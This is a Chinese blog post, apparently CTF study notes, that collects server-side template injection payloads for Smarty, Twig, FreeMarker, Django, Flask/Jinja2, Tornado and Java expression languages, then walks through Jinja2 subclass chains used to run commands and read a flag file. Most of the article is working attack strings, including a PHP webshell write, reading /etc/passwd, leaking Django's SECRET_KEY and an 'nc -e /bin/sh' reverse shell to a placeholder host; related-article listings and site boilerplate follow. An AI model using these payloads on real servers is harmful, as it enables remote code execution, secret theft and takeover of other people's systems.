fask--SSTI模块注入

最新推荐文章于 2024-03-22 16:52:17 发布
最新推荐文章于 2024-03-22 16:52:17 发布
阅读量563 收藏 1
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43613772/article/details/107730809
版权

攻击方法:
一.利用模板本身的特性进行攻击

1、Smarty

payload:

{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{self::getStreamVariable("file:///proc/self/loginuid")}

2.Twig

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}

{{_self.env.getFilter("id")}}

3.freeMarker

payload:

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

二.利用框架本身的特性进行攻击

1.Django

payload:

http://localhost:8000/?email={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}

http://localhost:8000/?email={user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY}

2.Flask/Jinja2

最终的 payload:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aSHELL = system') }}
//写文件
{{ config.from_pyfile('/tmp/evil') }}
//加载system
{{ config['SHELL']('nc xxxx xx -e /bin/sh') }}
//执行命令反弹SHELL

3.Tornado

payload:

http://117.78.26.79:31093/error?msg={{handler.settings}}

三.利用模语言本身的特性进行攻击

JAVA
payload:

${T(java.lang.System).getenv()}

${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

当然要是文件操作就要用另外的类了,思路是不变的

payload:

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang

** 详细解释**

{{config}}可以获取当前设置

{{self}}

{{self.__dict__._TemplateReference__context.config}} 同样可以看到config

__class__ 返回类型所属的对象
__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__ 类的初始化方法
__globals__ 对包含函数全局变量的字典的引用
__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__bases__ 返回该对象所继承的基类 __builtins__是做为默认初始模块

直接上payload
第一种

().__class__.__bases__[0].__subclasses__() 
---查看可用模块

().__class__.base__.__subclasses__().index(warnings.catch_warnings)
可以查看当前位置,不过题目环境不能用。手动数吧= = 169位

{{().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
发现可以执行,构造命令
{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
没有什么过滤= =友好!

第二种

或者找到os._wrap_close模块 117个

{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('dir').read()}}  
当前文件夹
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}

来打开文件,payload有很多慢慢摸索慢慢积累= =

第三种

我的payload:

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

我找的threading.Semaphore模块。。

参考:
SSTI从零到入门
fake google
CTF SSTI

野九
关注
专栏目录
SSTI(模块注入)的简单学习
dbabs的博客
02-05 736
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
Linux系统管理12:配置与磁盘管理
胖大xian
04-27 1662
配置与磁盘管理一、常见的硬盘管理命令1.df命令:统计分区大小,占用率2.du命令:统计文件大小,占用率3.fask命令文件系统修复命令4.dumpe2fs显示磁盘状态5.stat显示文件的详细时间6.判断文件类型二、fdisk命令手工分区1.查看所有硬盘及分区2.进行磁盘分区2.1创建主分区:2.2创建扩展分区:2.3创建逻辑分区:简述2.4修改分区类型3.mkfs格式化分区4.建立挂载点与挂载...
SSTI模板注入
qq_74020399的博客
04-20 804
SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。
SSTI 模板注入
weixin_53150482的博客
07-18 1230
SSTI 模板注入
SSTI (服务器模板注入)
热门推荐
Hydra的博客
11-02 2万+
 先来一波flask ssti漏洞的代码。 #python3 #Flask version:0.12.2 #Jinja2: 2.10 from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request....
深入浅出带你了解SSTI模板注入
Galaxy_0的博客
02-12 472
深入浅出带你了解SSTI模板注入
fask.rar_fask_数值算法/人工智能
09-21
标题中的"fask.rar_fask_数值算法/人工智能"暗示了这是一个与数值算法和人工智能相关的压缩文件,其中可能包含了实现或示例代码。"fask"可能是项目或文件集的名称,而".rar"是文件的压缩格式,通常用于存储和传输多...
fask:父子卡拉OK网站
03-13
fask:父子卡拉OK网站】是一个以HTML为基础的在线平台,旨在为亲子关系提供一个互动的娱乐空间,让父母和孩子们可以通过...通过分析和理解【fask-main】文件中的代码,我们可以深入了解其背后的开发技术和设计思路。
Git -- fast版本控制
周琛的点滴记录~
07-15 430
Git 学习 Git 学习 Git的优势 Git与SVN的主要区别 安装 Git 初始化 Git 仓储/(仓库) 配置使用者的用户名和邮箱 把代码 存储到仓库中 Git 查看日志 Git 版本回退 Git 分支的新建与合并 上传至 github 通过 ssh 方式 上传 代码 push 和 pull 简写 什么是 Git? git – fast版本控制 Git 是由“Linux之父” Lin...
fask:快速任务和项目 Web 应用程序
05-29
欢迎来到 GitHub 页面 您可以使用的在 Markdown 文件中维护和预览您网站的内容。 每当您提交到此存储库时,GitHub Pages 都会运行从您的 Markdown 文件中的内容重建您站点中的页面。 降价促销 Markdown 是一种轻量级且易于使用的语法,用于为您的写作设置样式。 它包括以下约定 Syntax highlighted code block # Header 1 ## Header 2 ### Header 3 - Bulleted - List 1. Numbered 2. List **Bold** and _Italic_ and `Code` text [ Link ](url) and ![ Image ](src) 有关更多详细信息,请参阅 。 杰基尔主题 您的 Pages 站点将使用您在选择的 Jekyll 主题的布局和样式。 该主题的名称保
module-injection:展示模块注入概念的研发项目
06-06
模块注入 模块注入是构建单页应用程序 (SPA) 的新方法的概念验证。 SPA 很棒,但经典的方法在服务器和客户端之间造成了脱节,并为客户端引入了大量不必要的复杂性。 这种方法试图解决这个问题。 如何运行这个实验 创建 ssl 密钥 mkdir keys openssl genrsa -des3 -out keys/server.orig.key 2048 openssl rsa -in keys/server.orig.key -out keys/server.key openssl req -new -key keys/server.key -out keys/server.csr openssl x509 -req -days 365 -in keys/server.csr -signkey keys/server.key -out keys/server.crt 更多信息: :
ssti 常见注入模块利用
2202_75317918的博客
10-10 245
python脚本(这里以重庆橙子科技jinjia2模板注入为例)使用hackbar测试一下使用bp,看不到passwd,直接读取flag是 FileLoader 对象的一个方法,用于获取指定文件的内容。利用时第一个参数为 0 ,第二个参数为文件路径即可。
SSTI注入,简单记录一下(config)
a3320315的博客
01-28 2532
输入数据有回显,看返回头是python写的后台,猜测有SSTI(加了个php模式的报错和index.php路由不知道有没有骗到某个师傅–) 然后接下来是绕WAF,我写了两个过滤,一个强过滤是匹配{{和}},目的是想让各位师傅用远程SSTI把flag打到自己服务器上。 然后是一个简单的单词匹配过滤os等敏感字符,只要FUZZ一下,再实验一下,会找到config这个大多数poc都用不上且过滤排在较后,...
SSTI-模板注入小知识
m0_51326092的博客
07-24 380
文章目录SSTI简要介绍flask/jinja总结 SSTI 借鉴大佬博客: https://www.cnblogs.com/20175211lyz/p/11425368.html 浅析SSTI(python沙盒绕过) 简要介绍 SSTI 全称Server Side Template Injection,服务器模板注入。 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程,服务端把用户输入的内容渲染成模板就可能造成SSTI。 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务
SSTI——java里的ssti
wwwwyyyrre的博客
06-08 591
因为从来没接触过java语言 所以对这些也是基本上一窍不通 这里只简单的提及 不做具体介绍会找一下题来做 但是没有找到有关java ssti的题目。
java审计-SSTI
最新发布
admin741admin的博客
03-22 216
【代码】java审计-SSTI
[Java-sec-code]Java velocity SSTI
Y4tacker的博客
07-25 1065
文章目录Java velocity Java velocity 可以看一看这一篇文章 java velocity模板用法(替换、循环、if判断)
java-sec-code学习之SSTI
midi
08-13 1355
前言 项目是java-sec-code:https://github.com/JoyChou93/java-sec-code SSTI,又称作模板注入,之前接触过python中flask的ssti模板注入,最终能达到rce,不过实战中比较少吧,php中比如smarty也会有相应的ssti模板注入。刚好今天来学习下java下的ssti。 0x01 从java代码出发 进入controller文件 /src/main/java/org/joychou/controller/SSTI.java 发现java使用
fask建立路由的原理是什么
02-11
路由建立是通过在网络中传播路由信息来建立路由的。路由信息包括源地址、目的地址和路由表项,路由表项中包含指向下一跳的接口信息、目的网络地址和路由类型等。有了路由表,路由器就可以根据每个数据包的源地址和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值